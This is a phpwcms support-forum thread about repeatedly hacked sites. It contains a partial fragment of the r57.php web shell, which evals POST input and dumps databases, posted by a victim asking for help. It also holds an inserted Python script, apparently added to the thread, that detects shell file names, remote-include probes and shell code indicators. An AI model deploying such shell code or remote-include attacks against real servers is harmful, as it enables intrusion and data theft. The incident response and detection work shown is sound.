HELP! I WAS HACKED!

Get help with installation and running phpwcms here. Please do not post bug reports or feature requests here.
C3 Motorsport
Posts: 7
Joined: Thu 17. Mar 2005, 18:31
Location: San Jose, CA

Post by C3 Motorsport »

Oliver Georgi wrote: Normally phpwcms is (should be) safe - and I have not heard of any other hacked 1.3.3.

Oliver
I posted this one not too long ago...

http://www.phpwcms.de/forum/viewtopic.php?t=15646

I've been hacked over and over and over again. It's getting really old and I'm on the verge of moving to something else if I can't find out why.

I really love the program and would hate to have to transition to something else...but when I have about 40 sites on the same server and ONLY the phpWCMS ones are getting hit...something is wrong.

My hosting: Fatnetwork (reseller hosting, shared servers, globalvars is on - not sure how to turn them off if I don't own the server - and safemode is off)

Also, here is the code for the file that I found on my server allowing it to gain access to virtually everything...I can't read Arabic, so I'm not sure just how far it really goes. Oliver, I hope you can make some REAL sense of this and hopefully identify some way we can protect ourselves from it.

The file was saved as r57.php and if you Google that, there are TONS of reports of people being hacked by it. Mambo, phpWCMS, and other users alike.

Code:

","",$eval);
 @eval($eval);}
if ($_POST['cmd']=="mysql_dump")
 {
  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
  $sql = new my_sql();
  $sql->db   = $_POST['db'];
  $sql->host = $_POST['db_server'];
  $sql->port = $_POST['db_port'];
  $sql->user = $_POST['mysql_l'];
  $sql->pass = $_POST['mysql_p'];
  $sql->base = $_POST['mysql_db'];
  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
  else {
   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
   else { echo "[-] ERROR! Can't write in dump file"; }
   }
 }
echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";

...........

[Notice: Code partially removed by Oliver]

- Jason

C3 Motorsport: BMW Tuning & Accessories
http://www.c3motorsport.com
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22

Post by Oliver Georgi »

@C3 Motorsport
1) What release of phpwcms do you use?
2) Do you use any hack of phpwcms?
3) How do you remove it from system?

What's installed on your system is PHP.RSTBackdoor
http://securityresponse.symantec.com/se ... 22-4217-99

If you wish you can send me FTP login and I will have a look and check your system to see possible leaks and give you a detailed report.

The most important is register_globals Off.


Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
C3 Motorsport
Posts: 7
Joined: Thu 17. Mar 2005, 18:31
Location: San Jose, CA

Post by C3 Motorsport »

Oliver Georgi wrote:@C3 Motorsport
1) What release of phpwcms do you use?
2) Do you use any hack of phpwcms?
3) How do you remove it from system?

What's installed on your system is PHP.RSTBackdoor
http://securityresponse.symantec.com/se ... 22-4217-99

If you wish you can send me FTP login and I will have a look and check your system to see possible leaks and give you a detailed report.

The most important is register_globals Off.


Oliver
Oliver,

Thank you very much for responding so quickly. I can understand why you removed some of the code. I just posted it so you would know specifically what I was dealing with.

The version I am using on all of my sites is 1.3.3

http://www.jason-steele.com
http://www.c3motorsport.com
http://www.5-75.org
http://www.blackwidowproject.com

As for setting the register_globals to off...I don't own the server, and I do not believe that FatNetwork will make the appropriate change solely for me, given the large number of people on the servers.

I will PM you with the pertinent login info and would greatly appreciate any guidance/direction you can give me to seal up this hacking nightmare.
- Jason

C3 Motorsport: BMW Tuning & Accessories
http://www.c3motorsport.com
MattDwyer
Posts: 4
Joined: Sat 13. May 2006, 05:16

Post by MattDwyer »

One of my sites running 1.3.3 was hacked just recently, however it was ftp they broke into, not the website itself. They downloaded dozens of pages, altered, and re-uploaded them. It got my client blacklisted by Google for a few days.

Another client (also running 1.3.3) is seeing daily attempts to inject a URL.
The URLs point to PHP information-gathering scripts, but I tried it myself and got nothing other than the expected webpage.

I'm pretty certain that kind of attack will never work, but if someone would like to confirm that with a quick reply, I'd be much relieved. I am still monitoring the site and checking various settings just to be safe.
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22

Post by Oliver Georgi »

I could check the hosting account of C3 Motorsport. It has multiple additional problems:
- safe_mode = Off
- register_globals = On
- open_basedir not set
- 3rd party scripts with known problems
- older releases of cPanel

So it is/was really hard to say exactly where injection comes from.

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
C3 Motorsport
Posts: 7
Joined: Thu 17. Mar 2005, 18:31
Location: San Jose, CA

Post by C3 Motorsport »

Oliver Georgi wrote:I could check the hosting account of C3 Motorsport. It has multiple additional problems:
- safe_mode = Off
- register_globals = On
- open_basedir not set
- 3rd party scripts with known problems
- older releases of cPanel

So it is/was really hard to say exactly where injection comes from.

Oliver
Oliver has been a great help to me in identifying a lot of these issues, and I'm very grateful for his time. I've started implementing some of the corrective measures he's suggested on my other accounts and hopefully they will suppress most of the future attacks.

My next question is this: through the .htaccess and _.htaccess files, how do I set safe_mode to "on" for the local account (much like we did for register_globals) and then set "open_basedir"?

The cPanel I can do little about, and all 3rd party applications have been removed from my account with the exception of 1 commercial program which has no security issues that I'm aware of.
- Jason

C3 Motorsport: BMW Tuning & Accessories
http://www.c3motorsport.com
Pappnase

Post by Pappnase »

hello

If you google a little you will find that these settings can only be changed by your host.

But I think that's not your biggest problem ... some of the settings are the same as my settings ...

Maybe you should take a look at your logfiles and search for the PHP file which was uploaded to your space. There you should also see which script they used for uploading.
Oliver Georgi wrote:
- 3rd party scripts with known problems
- older releases of cPanel
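As an added example (not code from this thread or from phpwcms), here is the kind of log triage Pappnase suggests, combined with a quick check for the r57-style shell Oliver identified and for the "inject a URL" probes MattDwyer describes. The access-log lines, the IP addresses, the paths (e.g. /form.php, /picture/r57.php) and the PHP fragment are all constructed placeholders, and the shell file names and source indicators are assumptions drawn from the thread, not a complete signature set.

```python
import re
from urllib.parse import urlsplit, parse_qsl
from typing import Dict, List, Optional

# Constructed sample of Apache combined-format access-log lines. The IPs are
# documentation ranges and the paths are placeholders, not phpwcms URLs.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jun/2006:02:14:05 -0700] "GET /index.php?id=1 HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Jun/2006:02:14:09 -0700] "GET /index.php?id=1&inc=http://198.51.100.9/x.txt? HTTP/1.1" 200 611 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Jun/2006:02:14:11 -0700] "POST /form.php HTTP/1.1" 200 88 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Jun/2006:02:14:12 -0700] "GET /picture/r57.php HTTP/1.1" 200 31244 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Jun/2006:02:14:40 -0700] "POST /picture/r57.php HTTP/1.1" 200 2210 "-" "Mozilla/4.0"
192.0.2.55 - - [12/Jun/2006:08:01:30 -0700] "GET /index.php?id=3 HTTP/1.1" 200 4420 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# File names of widely reported PHP web shells; r57.php is the one found in the thread.
SHELL_NAMES = ("r57.php", "c99.php")

# Source-level indicators typical of such shells (the first two appear in the posted fragment).
SHELL_INDICATORS = ("@eval(", "$_POST['cmd']", "base64_decode(", "mysql_dump")


def parse_log(text: str) -> List[Dict[str, str]]:
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def is_shell_request(entry: Dict[str, str]) -> bool:
    """True when the requested file name is a known web-shell name."""
    path = urlsplit(entry["url"]).path
    return path.rsplit("/", 1)[-1].lower() in SHELL_NAMES


def is_rfi_attempt(entry: Dict[str, str]) -> bool:
    """A query value that is itself a URL is the classic register_globals /
    remote-include probe (the 'inject a URL' attempts described in the thread)."""
    query = urlsplit(entry["url"]).query
    return any(v.lower().startswith(("http://", "https://", "ftp://"))
               for _, v in parse_qsl(query, keep_blank_values=True))


def triage(text: str) -> Dict[str, object]:
    """Locate the first request to a shell and what the same client did before it."""
    entries = parse_log(text)
    first_hit: Optional[Dict[str, str]] = next((e for e in entries if is_shell_request(e)), None)
    prior: List[Dict[str, str]] = []
    if first_hit is not None:
        idx = entries.index(first_hit)
        # Everything the same client did before first touching the shell is the
        # candidate upload path; log order stands in for timestamp order here.
        prior = [e for e in entries[:idx] if e["ip"] == first_hit["ip"]]
    return {
        "first_shell_hit": first_hit,
        "prior_requests_from_attacker": prior,
        "rfi_attempts": [e for e in entries if is_rfi_attempt(e)],
    }


def scan_source(source: str) -> List[str]:
    """Return the shell indicators present in a PHP file's contents."""
    return [s for s in SHELL_INDICATORS if s in source]


# Constructed PHP fragment shaped like the one posted above (not the real shell).
SAMPLE_PHP = "<?php if ($_POST['cmd']==\"eval\") { @eval($_POST['code']); } ?>"

if __name__ == "__main__":
    report = triage(SAMPLE_LOG)
    hit = report["first_shell_hit"]
    print("first shell request:", hit["ip"], hit["time"], hit["url"])
    for e in report["prior_requests_from_attacker"]:
        print("  earlier from same IP:", e["method"], e["url"])
    print("remote-include probes:", len(report["rfi_attempts"]))
    print("indicators in sample file:", scan_source(SAMPLE_PHP))
```

On a real account you would feed the whole access log (and the FTP log, given MattDwyer's case) to triage() and run scan_source() over every .php file under the web root; the request immediately before the first 200 for the shell, from the same IP, is usually the script that wrote it. Finding an indicator in a file is a reason to inspect it, not proof by itself, since legitimate code also calls base64_decode().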
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22

Post by Oliver Georgi »

register_globals Off is the first and best thing you can do, and it always has to be set Off - it has been the default PHP configuration for several years. In combination with safe_mode On it's better, but that is not as important as register_globals set Off.

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
C3 Motorsport
Posts: 7
Joined: Thu 17. Mar 2005, 18:31
Location: San Jose, CA

Post by C3 Motorsport »

Got it. Thanks for the tip!
- Jason

C3 Motorsport: BMW Tuning & Accessories
http://www.c3motorsport.com